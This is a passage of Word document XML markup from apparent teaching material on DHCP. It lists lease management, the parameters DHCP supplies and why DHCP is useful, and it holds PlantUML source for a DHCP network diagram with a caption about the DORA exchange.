        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009733BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lease </w:t>
      </w:r>
      <w:r w:rsidR="002B5819" w:rsidRPr="009733BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>management</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>: Periodic renewal and release of IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C833E62" w14:textId="2B21CBC0" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="0085692D">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0085692D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DHCP </w:t>
      </w:r>
      <w:r w:rsidR="002B5819" w:rsidRPr="0085692D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>parameters provided</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD1D87" w14:textId="77777777" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="002B5819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP Address</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>: Unique network address for the device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76629B7B" w14:textId="77777777" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="002B5819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subnet Mask</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>: Network portion and host portion definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF3BCEA" w14:textId="77777777" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="002B5819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Default Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>: Router IP for external network access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A320F9" w14:textId="77777777" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="002B5819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS Servers</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>: Domain name resolution servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01349A45" w14:textId="77777777" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="002B5819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lease Time</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>: Duration the IP address is valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0F0A2E" w14:textId="77777777" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="002B5819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Additional Options</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>: NTP servers, domain name, boot servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E065AA3" w14:textId="0A0182D5" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="0085692D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0085692D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Why DHCP </w:t>
      </w:r>
      <w:r w:rsidR="002B5819" w:rsidRPr="0085692D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>is essential</w:t>
      </w:r>
      <w:r w:rsidR="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CFC894" w14:textId="58723FD9" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="002B5819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Automatic </w:t>
      </w:r>
      <w:r w:rsidR="002B5819" w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>: Eliminates manual IP address assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524E936E" w14:textId="39A4D306" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="002B5819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Centralized </w:t>
      </w:r>
      <w:r w:rsidR="002B5819" w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>management</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>: Single point of control for network parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7ACF9C" w14:textId="2222788B" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="002B5819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidR="002B5819" w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>address conservation</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>: Efficient use of available IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217B55B0" w14:textId="16111E9A" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="002B5819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Conflict </w:t>
      </w:r>
      <w:r w:rsidR="002B5819" w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>prevention</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>: Ensures unique IP address assignments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1392F564" w14:textId="275CA431" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="002B5819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Simplified </w:t>
      </w:r>
      <w:r w:rsidR="002B5819" w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>administration</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>: Reduces network management complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DCB681" w14:textId="5EFDEFC5" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="002B5819">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="339"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dynamic </w:t>
      </w:r>
      <w:r w:rsidR="002B5819" w:rsidRPr="002B5819">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>allocation</w:t>
      </w:r>
      <w:r w:rsidRPr="0085692D">
        <w:t>: Supports mobile devices and changing network topologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB47851" w14:textId="3CAAE586" w:rsidR="00953178" w:rsidRDefault="00953178" w:rsidP="0085692D">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00953178">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Diagra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6"/>
        <w:gridCol w:w="1380"/>
      </w:tblGrid>
      <w:tr w:rsidR="00953178" w14:paraId="6E3F49B0" w14:textId="77777777" w:rsidTr="00953178">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8748" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CE8F2F9" w14:textId="3DE4BF14" w:rsidR="00953178" w:rsidRDefault="00953178" w:rsidP="00383BAE">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D2E4828" wp14:editId="49BAA24A">
                  <wp:extent cx="10092906" cy="4357823"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
                  <wp:docPr id="95405871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12409" cy="4366244"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8748" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02B7B0F9" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@startuml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C0CE0E6" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>title DHCP Network Overview</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="751CCA58" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C8B8D4C" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>package "DHCP Network" {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40B89C36" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "DHCP Server\n192.168.1.1" as dhcp_server #lightblue {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="054DAA59" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "IP Pool\n192.168.1.100-200" as ip_pool</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F8CCCEF" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Lease Database" as lease_db</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="279EB3EF" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Configuration Options" as config_opts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E6999C4" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="043CA1B0" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="25139A3B" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Network Switch" as switch #lightgray</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C10933C" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22ED61C8" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "DHCP Clients" as clients {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07CCE83D" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Laptop\nDHCP Client" as laptop #lightgreen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AF61093" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Smartphone\nDHCP Client" as phone #lightgreen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CE6BBE2" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "Printer\nDHCP Client" as printer #lightgreen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AC296D5" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "IoT Device\nDHCP Client" as iot #lightgreen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06213908" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43959E9B" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note bottom of ip_pool : Available IP addresses\nfor dynamic assignment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DF26AB6" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note bottom of lease_db : Tracks active leases\nand expiration times</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37F4B01E" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  note bottom of clients : Devices receive:\n• IP Address\n• Subnet Mask\n• Default Gateway\n• DNS Servers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41154D3C" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6940C492" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="74C203B5" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>dhcp_server --&gt; switch : DHCP Responses</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52151B75" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>switch --&gt; clients : IP Configuration</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ECB3624" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>clients --&gt; switch : DHCP Requests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24E8C65E" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>switch --&gt; dhcp_server : DHCP Discovery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="110EBBF9" w14:textId="77777777" w:rsidR="00953178" w:rsidRPr="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6FBE2FDE" w14:textId="7D4DFF4B" w:rsidR="00953178" w:rsidRDefault="00953178" w:rsidP="00953178">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00953178">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF6B95" w14:paraId="684F8405" w14:textId="77777777" w:rsidTr="00953178">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8748" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="749E8E4C" w14:textId="77777777" w:rsidR="00FF6B95" w:rsidRDefault="00FF6B95" w:rsidP="00FF6B95">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D4EAE97" wp14:editId="78D15ED3">
                  <wp:extent cx="5409810" cy="5641676"/>
                  <wp:effectExtent l="0" t="0" r="635" b="0"/>
                  <wp:docPr id="1213878855"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992" cy="5677323"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="42DFB5D8" w14:textId="056F1591" w:rsidR="00892607" w:rsidRDefault="00892607" w:rsidP="00FF6B95">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>DORA: Discovery + Offer + Request + Ack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8748" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="398DA40C" w14:textId="77777777" w:rsidR="00892607" w:rsidRPr="00892607" w:rsidRDefault="00892607" w:rsidP="00892607">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00892607">
              <w:rPr>
